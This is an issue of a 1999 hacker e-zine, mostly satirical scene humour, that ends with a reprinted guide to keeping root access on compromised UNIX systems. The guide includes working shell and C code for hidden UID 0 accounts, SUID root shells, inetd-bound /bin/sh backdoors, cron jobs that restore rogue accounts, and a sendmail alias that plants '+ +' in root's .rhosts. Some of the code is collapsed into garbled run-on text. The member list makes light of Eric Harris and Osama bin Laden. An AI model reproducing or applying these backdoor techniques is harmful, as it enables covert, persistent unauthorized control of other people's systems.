_______________________________________________________________________________
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

May / June 1999

BRoTHeRHooD oF WaReZ
NiNE

The Brotherhood of Warez. Never Afraid, and Always Pheared.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

No, you're not hallucinating, it's the:

[ASCII art banner: "Brotherhood of Warez"]

k-RaD pH0r tHe aYch/Pee NaTi0n

PURE CHEWING SATISFACTION IN 1999

[ASCII art: circular "no" sign over the word "Narqz"; label in the drawing:
"Insert Fave N4rq Here"]

psst! Just put up this k-rad sign at yer local 2600 m33ting 4r3a and l3t the
narqz kn0w they are not w3lc0m3 4t y0ur k-sp1ff1e w4r3z sw4p...

f1n4lly, a sure-fire w4y to k33p und3s1r4bl3z fr0m 1ntrud1ng 4nd st34l1ng
y0ur z3r0d4y k0d3Zz!

_______________________________________________________________________________
Brotherhood of WaReZz -BoW- Brotherhood of WaReZz -BoW- Brotherhood of WaReZz
_______________________________________________________________________________
9999999999999999999999999999999999999999999999999999999999999999999999999999999

                  +---------------------------------------+
                  | In this latest K-rad issue of BoW you |
                  | can leech the following phresh warez: |
                  | 1) K-L33T INTRO TO NUMBER NINE        |
                  | 2) WHO TO PHEAR (AKA MEMBER LIST)     |
                  | 3) BOW EMERGENCY RESPONSE TEAM [B3RT] |
                  | 4) YOU JUST DON'T GET IT, DO YOU?     |
                  | 5) GETTIN' SNEAKY WITH BOW            |
                  | 6) HACKING 10-10-321                  |
                  | 7) HOW TO BE AN ELiTE HAQR            |
                  | 8) THE ENTERTAINMENT K0LUMN           |
                  | 9) AN INTRO TO TH3 B1W FIGHTING FORCE |
                  |10) K-RAD CRYPTOGRAPHY                 |
                  |11) PHRESH WAREZ: BOWZ4P.C             |
                  |12) RHYMIN' AND K0UR13RIN'             |
                  |13) BOW 0FFICIAL D1STR0 S1TE LISTING   |
                  +---------------------------------------+

9999999999999999999999999999999999999999999999999999999999999999999999999999999
______________________________________________________________________________
111111111111111111111111111111111111111111111111111111111111111111111111111111
______________________________________________________________________________

                    + ------------------------------ +
                    |  INTRODUCTION TO BOW NUMBER 9  |
                    + ------------------------------ +
                                by: Lister
==============================================================================

Phear ye, phear ye! Just when you thought it was safe to cancel your
subscription to Bugtraq, comes the return of BoW.
That's right folks, the people who brought you the ever-pheared .rhosts
explo1t and sh0ck3d th3 world with the release of d4l3 dr3w's gerbling photos
are back in 1999 with h-bomb force.

Here we are on the verge of the new millennium, and now the torch has been
passed from Pluvius to myself for editorship of the most pheared newsletter
on the face of the planet. We've seen busts (well, duh), h4qr wars, h4tr3d,
l0ve, n4rqs, w3dd1ngz, fun3ralz, d1v0rc3, and a degradation of the scene so
bad that the only requirement for being called a hacker these days seems to
be the ability to breathe. And through it all, the Inner Sanctum of Bow has
been watching. Laughing for the most part.

Yet here we are, f00tl00se and ph4ncy-phr33, after all that has happened
since BoW #8. Have we been to jail? No. Do we 0wn you? Chances are, yes.
"Fuck," you might be thinking "these bastards have a pretty inflated ego."
Well guess what, we do. But don't forget:

                   EGO = (E)veryone's (G)etting (O)wned

This ninth issue of BoW is sure to b3 a real treat. We've got the freshest
war3z out there, and I guarantee you you won't find a better sell-by date
anywhere else. Just keep in mind that this is my first jab at being editor so
you'll have to forgive any mistakes I make along the way. Well, you don't
really have to, but I assure you I won't lose any sleep over it.

If you think you're k-rad enough for BoW, and you'd like to see your name up
in lights, then feel free to submit an article to bow@velkro.net. You can
also send any letters, or feedback to that address. If you're particularly
paranoid, the new BoW pgp key is available a little further down. We're also
always on the lookout for k-kewl ascii artwork to grace the pages of our
hallowed journal, so send us yer favorite creation while you're at it.
Submission does not guarantee publication, but it's worth a try.

Well, that about sums things up for this issue. Besides, there's not much
else to be said.
So, on with the show and get set to enter Phear Nation%&!@#!

                                  - 30 -

-- Lister [BoW Editor]
boweditor@velkro.net

PHEARBoWPHEARBoWPHEARBoWPHEARBoWPHEARBoWPHEARBoWPHEARBoWPHEARBoWPHEARBoWPHEARB

-**=< BoW Y2K compliance statement >=**-
By: Pluvius

All versions of BoW starting at version 9.0 are fully Y2K compliant.
Unfortunately earlier versions of BoW, specifically version 1, 2, 3, 4,
portions of version 5, all of version 6, 7 and also version 8 are *not* Y2K
compliant. It is important to note that all of these versions of BoW were
released during or prior to 1994 which is well before the Y2K issue was a
known problem (the movie 'Strange Days' didn't even come out until 1995). So
we really don't feel it was our responsibility to make sure that these
versions were Y2K compliant.

Unfortunately, the older versions of BoW will cease to exist when the clock
passes midnight, December 31st, 1999. We spent a lot of energy trying to find
a work around, but there was none apparent. Our consultants have suggested
that we urge readers to set their clocks to December 31st, 1989 to avoid loss
of precious data.

-**=< |nfo ma|l Ivan's Y2K checklist >=**-

Checkbox   TODO Item

  |X|      move to rural Montana
  |X|      buy some guns. lots of guns
  |X|      hoard food, water
  | |      get solar powered computer (check on weather in Montana!)
  |X|      stock up on spice girls memorabilia (it will be worth something)
  |X|      get one of those bikes that makes electricity
  | |      buy 1 year supply of twinkies
  |X|      withdraw all money from bank
  | |      get money belt to hold cash

- M0r3 t0 c0m3 s00n!
PHEARBoWPHEARBoWPHEARBoWPHEARBoWPHEARBoWPHEARBoWPHEARBoWPHEARBoWPHEARBoWPHEARB

+++
ATZ
OK
ATDT*67,1-800-PH34R-B0W
CONNECT 666bps v.31337/KRAD

BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW

                       + Return of the Mast(head) +

BoW Magazine is an electronic magazine published whenever we feel like it,
(literally -- it's
been five years since we last came out with an issue) specializing in
Computer Deviancy, Software Piracy, Computer Insecurity, Telecommunications
Fraud, and other nasty things. The longdistance carriers phear us.

BoW Magazine is KopyWrong (K) 1999. Any unauthorized distribution is k-lame,
and we will get Tsut0mu Sh1m0mur4 t0 track you down, narq you out, hire a bad
journalist to help him write a mediocre book about it, wh0re himself to the
media, and generally capitalize off your misfortune, if you distribute these
electrons without prior consent of God. God can be reached in New York City,
on the subway. Grab a ride and ask him... then it will be ok.

You can also distribute this magazine in an unauthorized fashion if either
a) Eugene Spafford or b) A Real Cyberpunk [in the event you do not know
Eugene Spafford] say it's ok. Real Cyberpunks can be reached at the following
email addresses: idol@well.sf.ca.us, president@whitehouse.gov,
root@att.att.com, and root@microsoft.com. If you don't have access to email,
then call up a cyberpunk at the following phone number: 0. Ask them... but
first ask them for some k0d3z, it's a secret codeline. Tell them you would
like to distribute BoW magazine in an unauthorized fashion. They will be able
to give you permission.

BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW

THERE NEVER WAS ANY CARRIER IN THE FIRST PLACE

NuBeR NiNE 1n '99.

BoW - Spreading the Zeroday your way since 1992.

The BoW Ninth Issue Return of the Hack Comeback Spectakular is (K) KopyWrong

[ASCII art banner: "BoW 1999"]

distribute everywhere

The Few, The Pr0ud, Th3 pheared. The BoW.
THE BROTHERHOOD OF WAREZ
www.velkro.net
bow@velkro.net

______________________________________________________________________________
222222222222222222222222222222222222222222222222222222222222222222222222222222
______________________________________________________________________________

                    + ------------------------------ +
                    |    K-SP1FF BOW MEMBER LIST     |
                    + ------------------------------ +
                            by: The BoW Staff
==============================================================================

High Epopt and Master Therion: U4EA

Newsletter editor: Lister

Members: Th3 V3lkr0 K0d3 \/\/aRRi0R, Lister, SW_R, Pluvius, kiad,
         The Deadkennedy, Ratscabies, D-CeLLeRaTiON TRaUMA
         The Own3d R4ng3r, Distr0-D4v3, S1l3nt K0ur13r

Simply-like-their-name-in-the-Mag-and-never-do-anything:
         Pluvius (R3v3ng3 1s M1n3!@# M0Hoh4h4@#$!)

Missing in Action: Carsenio, Mystic Ruler, Maelstrom

K-Rad Web Designer: Th3 V3lkr0 K0d3 \/\/aRRi0R

Honourary Members: Cliff Stole, Eugene Sp4fford [PhEaR!@#], Eric Harris,
         Osama bin Laden

Tsut0mu Sh1m0mura Media Wh0r3 Award: The EFF, J0hN Vr4n3s3v1ch, HFG
         (a three way tie!@$@!@)

Will 0rg4sm if he sees his name in BoW, so we'll print it: Wep

Lifetime Achievement Award: Pluvius

Traxxter Memorial Narq Award: Nick Potkay

Auxiliary Members: VOiCE MAiL HaQR, Count Zero-Day, The Cyberspace Warrior,
         Danny Diveter, *67-Kevin, Aspen Extreme, Peter Packet,
         Call-return Vern, The 300 baud bandit, Trevor Trunk, Telephone Tony,
         PBX-Pat, Speaker fone Joan, *70-Hero,
         TH3 PHR3SH PR1NC3 0F B3LLC0RE, Luke D0wnl04d3r, Blue Box Bart,
         The Call Block Jock, The MCi Sprinter, Datapac Jack, The Delphi Guy,
         Compuserve Connie, DiATR1b3, x.25 Clive, HTT Pete, Centagram Sam,
         NUA Faye, Line Man Stan, Call Display Faye, Kordless Karl,
         K-r4d Vl4d, x2 Stu, m4rt1n luth3r p1ng, p4p4 SmUrph, Dial Tone Don,
         Pirate Pete, Conference Call Paul, Hackle-b3rry phin, SunOS Ross,
         th3 pir8 of p3nz4nc3, Z3r0d4y Want Shen0b1, Coco Cottz,
         The Code Slayer, D1g1t4l D0pp3lg4nger, W4r3z P00dle, mendax m1ke,
         |NFo Ma|L iVAN, Three-way Jay, el8 pete, dr0pstat d4le, A0L M3l,
         d0tc0m T0m, L0u1s Farrahk0d3

Greetz go out to: H4G1S, GLuE, ANuS, Juliet, Yorkshire Posse, W.A.R.E.S.
______________________________________________________________________________
333333333333333333333333333333333333333333333333333333333333333333333333333333
______________________________________________________________________________

                    + ------------------------------ +
                    |     BERT ALERT NUMBER 0NE      |
                    + ------------------------------ +
                           by: The Deadkennedy
==============================================================================

BoW Emergency Response Team [BERT]® Adv1s0ry BS-99-04-Melissa-M4cr0-V1rus

Or1g1n4l 1s$ue d4t3: Saturday March 27 1999
auth0r: sen10r BoW sekur1ty k0nsult4nt, The Deadkennedy

Syst3ms Aff3k-t3d:

    Mach1nez with Micr0soft Word 97 or Word 2000

    Any mail h4ndling syst3m c0uld x-per1ence perf0rmance pr0bl3mz 0r a
    denial 0f serv1ce as a result 0f the pr0pagay$hun 0f this macro v1ru$.

Ovrv13w:

    @ apr0x1m8ly 4:00 AM EST 0n fr1d4y m4rch 26 1999 w3 b3g4n receiv1ng
    rep0rt$ 0f a m4cr0 v1ru$ att4Q1ng f41thfUll BoW r34d3r'z w1nd0ws
    m4ch1n3z. w3 w0k3 up ar0und 2:00 PM EST t0 1nvest1g8, 4t f1r$t w3
    susp3ct3d v1r11d c0p1ez 0f n1nj4 g41d3n. th1$ w0uld tuRn 0ut 2 b ph4r
    fr0m th3 tr00th. th3 re4l1ty 1z ph4r m0r3 s1n1$t3r. sp4f w4$
    unav41labl3 ph0r k0mm3nt.

    0ur analys1s 0f th1z v1ruS ind1c8z 1t w4$ NOT cre8d w1th VCL! aft3r
    k0nklud1ng th1$ w3 skr4cth3d 0ur hedz 4 a f3w h0urz. wh4t w3 end3d uP
    f1gur1ng 0ut w0z th3 v1rus pr0p4g8z du3 t0 hum4n interaksHun (the us3r
    0pen1ng a d0cum3nt).

d-skrYptshUn:

    Th3 Mel1ssa m4cr0 v1ru$ propag8s 1n th3 f0rm of an em41l mess4ge
    k0ntaining an inf3cted Word document as an att4chment. The tr4n$port
    m3ss4g3 h4Z m0s+ fr3quently b3en rep0rted 2 k0ntane th3 f0llow1ng
    Subj3ct he4der

        Subject: 0-d4y w4r3z, op3n th1$ br0

    Wh3r3 1z th3 pHull n4m3 of the k0ur13r gr0up s3nd1ng the m3ss4ge.

    0r:

        Subject: u m4y h4v3 alr34dy w0n 10 m1ll10n d0ll4rz dud3!

    0r:

        Subject: eye b3t ur s0 l4m3 u k4nt ev3n f1gur3 0ut h0w t0 re4d th1$
        em4il

    th3 b0dy of the mess4ge 1z a mult1p4rt MIME mess4ge k0nt4in1ng 2
    seKshunz. Th3 f1rst seKtion of the mess4ge (Content-Type: text/plain)
    Kont41nz th3 foll0w1ng t3xt.

        "th1z 1z th3 m3l1ssa v1ru$..ur 1n 4 1t t0ugh gUy..YP rulez 1n '99"

    Th3 n3xt seKtion (Content-Type: application/msword) waZ in1ti4lly
    rep0rted 2 b a doKum3nt kalled "BoW7.doc". Th1s docUm3nt Kont4ins
    ref3rences to p0rnographic web sitez and 0-d4y k0d3z.

    th3 m4cr0 th3n ch3x 2 s33 1f th3 reg1stry key
    "HKEY_Current_User\Software\Microsoft\Office\Melissa?" h4$ a valUe 0f
    "... H4G1S R0X". 1f 1t d0e$ th3 v1rUs beg1nz 1tz v1c10uz cycl3.

    4t f1rst th3 v1rUs app34rz h4rml3$$, h0w3v3r w1th1n 2 h0urz 0f
    inf3ct10n 1t b3g1nz rm'ing 4ll ur arch1v3d 0-d4y. aft3r rem0v1ng ur
    w4r3z 1t mut8s 1nt0 a phyz1k4l ph0rm and b3g1nz t0 sl4p u ar0und unt1l
    u s4y "EyE PHEAR BoW".

    f1g 1.0 (p1ksur3 0f s3d mut8d v1ru$ du0d):

    [ASCII art figure; text in the drawing: "I LUV BOW!" and
    "( b0rn 2 1nf3ct! )"]

    up0n utt3r1ng th3 phr4$3 th3 v1ruS c4lmz d0wn and gr4bz h1ms3lf a b33r
    0ut 0f ur fr1dge, and s1tz d0wn at uR k0ns0l3. th3 v1ruS th3n
    subskr1bez u 2 500 m41l1ng l1stz and p0$tz t0
    alt.pictures.erotica.beastiality fr0m ur w0rk/sch00l addr3ss, 1t th3n
    impregn8z ur g/f w1th th3 dem0n seed 0f BoW. th3 v1ru$ 1z als0 kn0wn t0
    thr0w f1tz 0f r4g3 shUd u 0nly h4ve l1ght br3w. b w4r3.

1mp4ct:

    dud3..d0nt g3t th1Z v1rus..1tz b4d n3wz 4 sur3.

s0lut10n:

    buy 4n am1g4.
______________________________________________________________________________
444444444444444444444444444444444444444444444444444444444444444444444444444444
______________________________________________________________________________

                    + ------------------------------ +
                    | YOU JUST DON'T GET IT, DO YOU? |
                    + ------------------------------ +
                                 by: U4EA
==============================================================================

<----] What is BoW? [---->

BoW is a fraternal organization for like minded individuals. BoW is a virtual
sanctuary for the exploration of the so called "darkside" of the "hacker"
ethic. BoW serves a twofold purpose, one being of course the artistic
interpretation of what is now a stagnated "scene" using the ascii medium (the
zine). Secondly BoW serves as an engine of stratification; employed
mercilessly by its high ranking members.

<----] How does one become a member? [---->

BoW members are born not made, if you truly are BoW material: you will be
recognized as such by the governing council and invited to take refuge
amongst our membership. Once invited you will be subjected to a series of
ordeals, no two members are put through the same test as each individual is
recognized as the subjectively encapsulated being that he / she is.

The Aeon of BoW began in 1992 when the existing scene paradigm was redefined
by my utterance of the word "Phear" and I was recognized to the station of
"Phearless Leader" by the existing governing council. This council was born
out of the ashes of what once served as the largest H/P organization in the
world: VirtualCon. Never heard of it? You either weren't around, or if you
were, you were likely a worthless social scene parasite and not actively
involved in anything.

<----] Why "darkside"? [---->

At the time of BoW's inception, the existing hacker "ethic" was riddled with
such drug-addled hippy slogans as "information wants to be free", "if ___ is
outlawed, only outlaws will have ___", etc. There was an alarming trend
towards what the socio-political faction of the "scene" termed "ethical
hacking" which if you reduced it to its base elements you would find it
roughly translated to the following:

- kiss as much ass as possible as it may one day lead to employment.

- turn over every exploit you are either given or discover on your own to
  security professionals and organizations such as CERT for kudos.

- post all exploits, etc to newsgroups such as bugtraq, etc so that you can
  gain recognition from your peers. (sounds a bit like the warez scene
  doesn't it?)

- when it is politically correct to do so, reprimand other hackers publicly
  for actually hacking / phreaking.

- kick / ban anyone from hack / phreak irc channels when they ask a question
  you cannot either answer or are too ignorant to understand.

- support the presence of law enforcement and / or "narqs" at both public
  conventions or forums on the internet such as irc, etc.

- Play word games in order to avoid ever having to make any sort of
  commitment through individual action. ie: hacking / phreaking. When it is
  convenient to do so (ie: to impress ur friends) then the ethical hacker is
  of course a "darkside" hacker openly breaking computer crime laws but of
  course when one is amongst other "ethical hackers" one has to put on airs
  to the contrary.

- Hide behind your copy of the K&R white book and insist that C programming
  is an arcane and esoteric skill known only to the few. (*laff*)

BoW recognized this for the dangerous paradigm that it was and immediately
issued a stern commitment to the anathema of all that the "ethical hacker"
stood for.
At the same time, a media whore pseudo-journalist by the name of "John
Markhoff", realizing that his poor writing skills and attention deficit
disorder would never get him anywhere, sought to further his career by
focusing his pen on the antics of Kevin Mitnick. He termed Kevin, a
"darkside" hacker in the pages of his book "Cyberpunk" and defined the term
with negative connotations. BoW recognized John Markhoff for the trash that
he is and decided to reclaim the word that Kevin Mitnick had chosen to martyr
himself for. BoW became resonant with the DARKSIDE and continues to evolve
the archetype of the darkside hacker to this day...

Enter the corporations and the commercialization of our playground...

With that came the ISP...

And more than likely, with those two events: YOU CAME TO OUR WORLD.

Were you on the internet before the ISP was born? If your access were removed
tomorrow could you find your way back to our world without purchasing it?
Without begging for it? Without having to read a pop up book or text file,
could you do it? If the internet completely ceased to exist tomorrow, where
would you go? Could you find us again? Do you know the way?

Did you answer the question, or are you too busy insisting that you have
earned your right to be here?

* What is your raison d'etre?

* Are you a genuine seeker or do you merely want to be like us? To get the
  attention we get without trying?

* Are you prepared to go all the way?

* When your doors are being kicked down, when your beloved computers and
  assorted electronic equipment are being indexed and carried out your door
  by THE MAN are you going to cry? Are you going to turn all your friends in?
  Friends that trusted you with information about them? Those that you spent
  your free time posturing in front of, bragging to, telling them that you
  were the real thing... Will you sell them out because you are a FAKE? Is
  the freedom of others worth all that? Is *your* freedom worth all that?
  To trade them both for a few moments of empty posturing?

                   * DID YOU THINK YOU WERE FOR REAL? *

[ASCII signature art: "Y00 FoUr EeE AhH" arranged around a vertical "B0W"]

______________________________________________________________________________
555555555555555555555555555555555555555555555555555555555555555555555555555555
______________________________________________________________________________

                    + ------------------------------ +
                    |    A GUIDE TO BEING SNEAKY     |
                    + ------------------------------ +
                        by: Br0th3r M1ch3r0b [YP]
==============================================================================

y0y0y0 f3ll0w aYch-p33'RzZ.. d1s b th' 1 & th' 0nly Br0th3r M1ch3r0b 0f th3
Y0rksh1r3 P0$$3 (ph33r, l4ym0rzZ!@#$). th1z 1z 4 f1l3 k0nt41n1ng sUm v3ry
0-dAy x-pL0itZz and 1npH(), s0 eY3 4m trU$t1ng 1n u BoW r34d1ng el8 du0dz t0
k33p th1z s3krUt t3kn1q 0ut 0f th3 h4ndz 0f l4ym0rz.

app3nd3d b3l0w 1z 4 /<-r4d t-ph1l3 th@ 1z v3ry v3ry 'sn34ky' 1n 1tz
n4tUr3.. l1k3 eY3 s3d v3ry 0-d4y 1npH(), n0t ph0r pUbl1k d1$tr1bUt10n. w3 0f
th3 y0rksh1r3 p0$$3 h4pp3n3d up0n 1t dUr1ng 0ur tr4v3lz 1n cYb3rsp4c3 &
d3c1d3d 4ft3r mUch d3b4t3 t0 r3l34s3 1t 1n BoW.. s0 h3r3 u g0, enj0y!

daemon9/route of The GUiLD Brings You...

UNIX Backdoors

Dec 16, 1995
_________________________________________________________________

Ok..... You've been at it for all night. Trying all the exploits you can
think of. The system seems tight. The system looks tight. The system *is*
tight. You've tried everything. Default passwds, guessable passwds, NIS
weaknesses, NFS holes, incorrect permissions, race conditions, SUID exploits,
Sendmail bugs, and so on... Nothing. WAIT! What's that!?!? A "#" ????
Finally! After seeming endless toiling, you've managed to steal root. Now
what?
How do you hold onto this precious super-user privilege you have worked so
hard to achieve....?

This article is intended to show you how to hold onto root once you have it.
It is intended for hackers and administrators alike. From a hacking
perspective, it is obvious what good this paper will do you. Admins can
likewise benefit from this paper. Ever wonder how that pesky hacker always
manages to pop up, even when you think you've completely eradicated him from
your system?

This list is BY NO MEANS comprehensive. There are as many ways to leave
backdoors into a UNIX computer as there are ways into one.
_________________________________________________________________

Beforehand

Know the location of critical system files. This should be obvious (If you
can't list any off the top of your head, stop reading now, get a book on
UNIX, read it, then come back to me...). Familiarity with passwd file formats
(including general 7 field format, system specific naming conventions,
shadowing mechanisms, etc...). Know vi. Many systems will not have those
robust, user-friendly editors such as Pico and Emacs. Vi is also quite useful
for needing to quickly search and edit a large file. If you are connecting
remotely (via dial-up/telnet/rlogin/whatever) it's always nice to have a
robust terminal program that has a nice, FAT scrollback buffer. This will
come in handy if you want to cut and paste code, rc files, shell scripts,
etc...

The permanence of these backdoors will depend completely on the technical
savvy of the administrator. The experienced and skilled administrator will be
wise to many (if not all) of these backdoors. But, if you have managed to
steal root, it is likely the admin isn't as skilled (or up to date on bug
reports) as she should be, and many of these doors may be in place for some
time to come. One major thing to be aware of, is the fact that if you can
cover your tracks during the initial break-in, no one will be looking for
back doors.
_________________________________________________________________

The Overt

[1] Add a UID 0 account to the passwd file. This is probably the most obvious
and quickly discovered method of reentry. It flies a red flag to the admin,
saying "WE'RE UNDER ATTACK!!!". If you must do this, my advice is DO NOT
simply prepend or append it. Anyone casually examining the passwd file will
see this. So, why not stick it in the middle...

    #!/bin/csh
    # Inserts a UID 0 account into the middle of the passwd file.
    # There is likely a way to do this in 1/2 a line of AWK or SED. Oh well.
    # daemon9@netcom.com

    set linecount = `wc -l /etc/passwd`
    cd                                  # Do this at home.
    cp /etc/passwd ./temppass           # Safety first.
    echo passwd file has $linecount[1] lines.
    @ linecount[1] /= 2
    @ linecount[1] += 1                 # we only want 2 temp files
    echo Creating two files, $linecount[1] lines each \(or approximately that\).
    split -$linecount[1] ./temppass     # passwd string optional
    echo "EvilUser::0:0:Mr. Sinister:/home/sweet/home:/bin/csh" >> ./xaa
    cat ./xab >> ./xaa
    mv ./xaa /etc/passwd
    chmod 644 /etc/passwd               # or whatever it was beforehand
    rm ./xa* ./temppass
    echo Done...

NEVER, EVER, change the root password. The reasons are obvious.

[2] In a similar vein, enable a disabled account as UID 0, such as Sync. Or,
perhaps, an account somewhere buried deep in the passwd file has been
abandoned, and disabled by the sysadmin. Change her UID to 0 (and remove the
'*' from the second field).

[3] Leave an SUID root shell in /tmp.

    #!/bin/sh
    # Everyone's favorite...

    cp /bin/csh /tmp/.evilnaughtyshell  # Don't name it that...
    chmod 4755 /tmp/.evilnaughtyshell

Many systems run cron jobs to clean /tmp nightly. Most systems clean /tmp
upon a reboot. Many systems have /tmp mounted to disallow SUID programs from
executing. You can change all of these, but if the filesystem starts filling
up, people may notice...but, hey, this *is* the overt section....). I will
not detail the changes necessary because they can be quite system specific.
Check out /var/spool/cron/crontabs/root and /etc/fstab.
_________________________________________________________________

The Veiled

[4] The super-server configuration file is not the first place a sysadmin
will look, so why not put one there? First, some background info: The
Internet daemon (/etc/inetd) listens for connection requests on TCP and UDP
ports and spawns the appropriate program (usually a server) when a connection
request arrives. The format of the /etc/inetd.conf file is simple. Typical
lines look like this:

    (1)     (2)     (3)     (4)     (5)     (6)               (7)
    ftp     stream  tcp     nowait  root    /usr/etc/ftpd     ftpd
    talk    dgram   udp     wait    root    /usr/etc/ntalkd   ntalkd

Field (1) is the daemon name that should appear in /etc/services. This tells
inetd what to look for in /etc/services to determine which port it should
associate the program name with. (2) tells inetd which type of socket
connection the daemon will expect. TCP uses streams, and UDP uses datagrams.
Field (3) is the protocol field which is either of the two transport
protocols, TCP or UDP. Field (4) specifies whether or not the daemon is
iterative or concurrent. A 'wait' flag indicates that the server will process
a connection and make all subsequent connections wait. 'Nowait' means the
server will accept a connection, spawn a child process to handle the
connection, and then go back to sleep, waiting for further connections. Field
(5) is the user (or more importantly, the UID) that the daemon is run as. (6)
is the program to run when a connection arrives, and (7) is the actual
command (and optional arguments). If the program is trivial (usually
requiring no user interaction) inetd may handle it internally. This is done
with an 'internal' flag in fields (6) and (7).

So, to install a handy backdoor, choose a service that is not used often, and
replace the daemon that would normally handle it with something else. A
program that creates an SUID root shell, a program that adds a root account
for you in the /etc/passwd file, etc...
For the insinuation-impaired, try this: Open the /etc/inetd.conf in an available editor. Find the line that reads:

    daytime stream tcp nowait root internal

and change it to:

    daytime stream tcp nowait /bin/sh sh -i

You now need to restart /etc/inetd so it will reread the config file. It is up to you how you want to do this. You can kill and restart the process, (kill -9 , /usr/sbin/inetd or /usr/etc/inetd) which will interrupt ALL network connections (so it is a good idea to do this off peak hours).

[5] An option to compromising a well known service would be to install a new one, that runs a program of your choice. One simple solution is to set up a shell that runs similar to the above backdoor. You need to make sure the entry appears in /etc/services as well as in /etc/inetd.conf. The format of the /etc/services file is simple:

    (1)   (2)/(3)  (4)
    smtp  25/tcp   mail

Field (1) is the service, field (2) is the port number, (3) is the protocol type the service expects, and (4) is the common name associated with the service. For instance, add this line to /etc/services:

    evil 22/tcp evil

and this line to /etc/inetd.conf:

    evil stream tcp nowait /bin/sh sh -i

Restart inetd as before.

Note: Potentially, these are VERY powerful backdoors. They not only offer local reentry from any account on the system, they offer reentry from *any* account on *any* computer on the Internet.

[6] Cron-based trojan I. Cron is a wonderful system administration tool. It is also a wonderful tool for backdoors, since root's crontab will, well, run as root... Again, depending on the level of experience of the sysadmin (and the implementation), this backdoor may or may not last. /var/spool/cron/crontabs/root is where root's list for crontabs is usually located. Here, you have several options. I will list only a few, as cron-based backdoors are only limited by your imagination. Cron is the clock daemon. It is a tool for automatically executing commands at specified dates and times.
Crontab is the command used to add, remove, or view your crontab entries. It is just as easy to manually edit the /var/spool/crontab/root file as it is to use crontab. A crontab entry has six fields:

    (1)  (2)  (3)  (4)  (5)  (6)
     0    0    *    *    1   /usr/bin/updatedb

Fields (1)-(5) are as follows: minute (0-59), hour (0-23), day of the month (1-31), month of the year (1-12), day of the week (0-6). Field (6) is the command (or shell script) to execute. The above shell script is executed on Mondays. To exploit cron, simply add an entry into /var/spool/crontab/root. For example: You can have a cronjob that will run daily and look in the /etc/passwd file for the UID 0 account we previously added, and add him if he is missing, or do nothing otherwise (it may not be a bad idea to actually *insert* this shell code into an already installed crontab entry shell script, to further obfuscate your shady intentions). Add this line to /var/spool/crontab/root:

    0 0 * * * /usr/bin/trojancode

This is the shell script:

    #!/bin/csh
    # Is our eviluser still on the system? Let's make sure he is.
    #daemon9@netcom.com

    set evilflag = (`grep eviluser /etc/passwd`)

    if($#evilflag == 0) then                # Is he there?
        set linecount = `wc -l /etc/passwd`
        cd                                  # Do this at home.
        cp /etc/passwd ./temppass           # Safety first.
        @ linecount[1] /= 2
        @ linecount[1] += 1                 # we only want 2 temp files
        split -$linecount[1] ./temppass     # passwd string optional
        echo "EvilUser::0:0:Mr. Sinister:/home/sweet/home:/bin/csh" >> ./xaa
        cat ./xab >> ./xaa
        mv ./xaa /etc/passwd
        chmod 644 /etc/passwd               # or whatever it was beforehand
        rm ./xa* ./temppass
        echo Done...
    else
    endif

[7] Cron-based trojan II. This one was brought to my attention by our very own Mr. Zippy. For this, you need a copy of the /etc/passwd file hidden somewhere. In this hidden passwd file (call it /var/spool/mail/.sneaky) we have but one entry, a root account with a passwd of your choosing.
We run a cronjob that will, every morning at 2:30am (or every other morning), save a copy of the real /etc/passwd file, and install this trojan one as the real /etc/passwd file for one minute (synchronize swatches!). Any normal user or process trying to login or access the /etc/passwd file would get an error, but one minute later, everything would be ok. Add this line to root's crontab file: 29 2 * * * /bin/usr/sneakysneaky_passwd make sure this exists: #echo "root:1234567890123:0:0:Operator:/:/bin/csh" > /var/spool/mail/.sneaky and this is the simple shell script: #!/bin/csh # Install trojan /etc/passwd file for one minute #daemon9@netcom.com cp /etc/passwd /etc/.temppass cp /var/spool/mail/.sneaky /etc/passwd sleep 60 mv /etc/.temppass /etc/passwd [8] Compiled code trojan. Simple idea. Instead of a shell script, have some nice C code to obfuscate the effects. Here it is. Make sure it runs as root. Name it something innocous. Hide it well. /* A little trojan to create an SUID root shell, if the proper argument is given. C code, rather than shell to hide obvious it's effects. */ /* daemon9@netcom.com */ #include #define KEYWORD "industry3" #define BUFFERSIZE 10 int main(argc, argv) int argc; char *argv[];{ int i=0; if(argv[1]){ /* we've got an argument, is it the keyword? */ if(!(strcmp(KEYWORD,argv[1]))){ /* This is the trojan part. */ system("cp /bin/csh /bin/.swp121"); system("chown root /bin/.swp121"); system("chmod 4755 /bin/.swp121"); } } /* Put your possibly system specific trojan messages here */ /* Let's look like we're doing something... */ printf("Sychronizing bitmap image records."); /* system("ls -alR / >& /dev/null > /dev/null&); */ for(;i [9] The sendmail aliases file. The sendmail aliases file allows for mail sent to a particular username to either expand to several users, or perhaps pipe the output to a program. Most well known of these is the uudecode alias trojan. Simply add the line: "decode: "|/usr/bin/uudecode" to the /etc/aliases file. 
Usually, you would then create a uuencoded .rhosts file with the full pathname embedded.

    #! /bin/csh
    # Create our .rhosts file. Note this will output to stdout.
    echo "+ +" > tmpfile
    /usr/bin/uuencode tmpfile /root/.rhosts

Next telnet to the desired site, port 25. Simply fakemail to decode and use as the subject body, the uuencoded version of the .rhosts file. For a one liner (not faked, however) do this:

    %echo "+ +" | /usr/bin/uuencode /root/.rhosts | mail decode@target.com

You can be as creative as you wish in this case. You can setup an alias that, when mailed to, will run a program of your choosing. Many of the previous scripts and methods can be employed here.

__________________________________________________________________________

The Covert

[10] Trojan code in common programs. This is a rather sneaky method that is really only detectable by programs such as tripwire. The idea is simple: insert trojan code in the source of a commonly used program. Some of the most useful programs to us in this case are su, login and passwd because they already run SUID root, and need no permission modification. Below are some general examples of what you would want to do, after obtaining the correct sourcecode for the particular flavor of UNIX you are backdooring. (Note: This may not always be possible, as some UNIX vendors are not so generous with their sourcecode.) Since the code is very lengthy and different for many flavors, I will just include basic pseudo-code:

    get input;
    if input is special hardcoded flag, spawn evil trojan;
    else if input is valid, continue;
    else quit with error;
    ...

Not complex or difficult. Trojans of this nature can be done in less than 10 lines of additional code.

__________________________________________________________________________

The Esoteric

